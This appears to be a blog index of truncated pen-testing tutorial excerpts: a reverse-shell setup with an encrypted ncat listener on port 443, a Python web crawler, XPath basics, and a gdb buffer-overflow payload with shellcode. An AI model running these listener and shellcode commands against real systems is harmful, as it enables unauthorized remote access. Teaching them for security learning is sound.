Buffer Overflow

Kali Linux is the defacto for pen testing. While any linux distro (or OS) can work for backdooring into networks, its quickest to just download a Kali Linux iso. It comes with most of the pen testing tools (some of them cost money but most are free) to get you up and running: https://www.kali.org/downloads/   Lets not waste time, we have a windows machine to administer (or connect to for nefarious purposes). Let's say the windows machine is behind a firewall with all inbound connections blocked as shown below: This will prevent us from doing a bind shell with windows, but not a reverse shell. To create a reverse shell, let's have our kali linux machine listen on an unused well known port, 443:  ncat -lvp 443 --ssl The -lvp command means listen verbosely on port 443. --ssl will encrypt all incoming traffic (note ssl is deprecated as of ncat 7.6. To use this option, ncat 7.5 should be installed). By encrypting our traffic, it will make it difficult, albeit not im

The last two weeks we learned python and xpaths. We are now going to combine the two lessons in an attempt to write a web crawler. The following code below was initially written by Umer Javed, you can crawl to his link below ;) from lxml import html import requests class AppCrawler:     def __init__(self, starting_url, depth):         self.starting_url = starting_url         self.depth = depth         self.current_depth = 0         self.depth_links = []         self.apps = []     def crawl(self):         app = self.get_app_from_link(self.starting_url)         self.apps.append(app)         self.depth_links.append(app.links)         while self.current_depth < self.depth:             current_links = []             for link in self.depth_links[self.current_depth]:                 current_app = self.get_app_from_link(link)                 current_links.extend(current_app.links)                 self.apps.append(current_app)                 time.sleep(5)          

Last week we looked at a light introduction to Python. This week we are going to take a look at XPaths. We need to learn xpaths if we are to build a web crawler which can be used to scrape data from websites. XPaths are fairly straightforward and easy to learn. Follow these steps: 1. Download the chrome browser and open it. 2. The default page should be Google so right-click on the "Google" icon 3. Select inspect . You should get the Developer Console to pop up as shown below: 4. Right-click on the highlighted element 5. Select Copy >> Copy XPath 6. Paste the path into any text editor, it should be this: //*[@id="hplogo"] There are two types of xpaths, absolute and relative. The xpath shown above is relative. The absolute xpath of the Google logo is: /html[1]/body[1]/div[1]/div[8]/span[1]/center[1]/div[1]/img[1] XPaths are subject to constant change so it is always good to use a relative xpath whenever possible. Breaking down the syntax for

Hello all, It's time to take a bit of a tangent and discuss a very readable, maintainable, c based, and large community supported language, Python! Why are we looking into Python? Python is used to write many tools that pen testers/hackers use on a daily basis, such as nmap. It can also be easily invoked in a shell which has many uses. Recall the first post on buffer overflow attacks? Python can be invoked in gdb (an assembler debugging tool) to execute shell code for a buffer overflow attack: (gdb) run $(python -c '"\x90" * bytes + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "return_addr" * 10) Where bytes is the number of bytes required to overwrite a program's return address and return_addr is any address that returns the program into the NOP sled. Python is powerful! So it is worth while to learn it.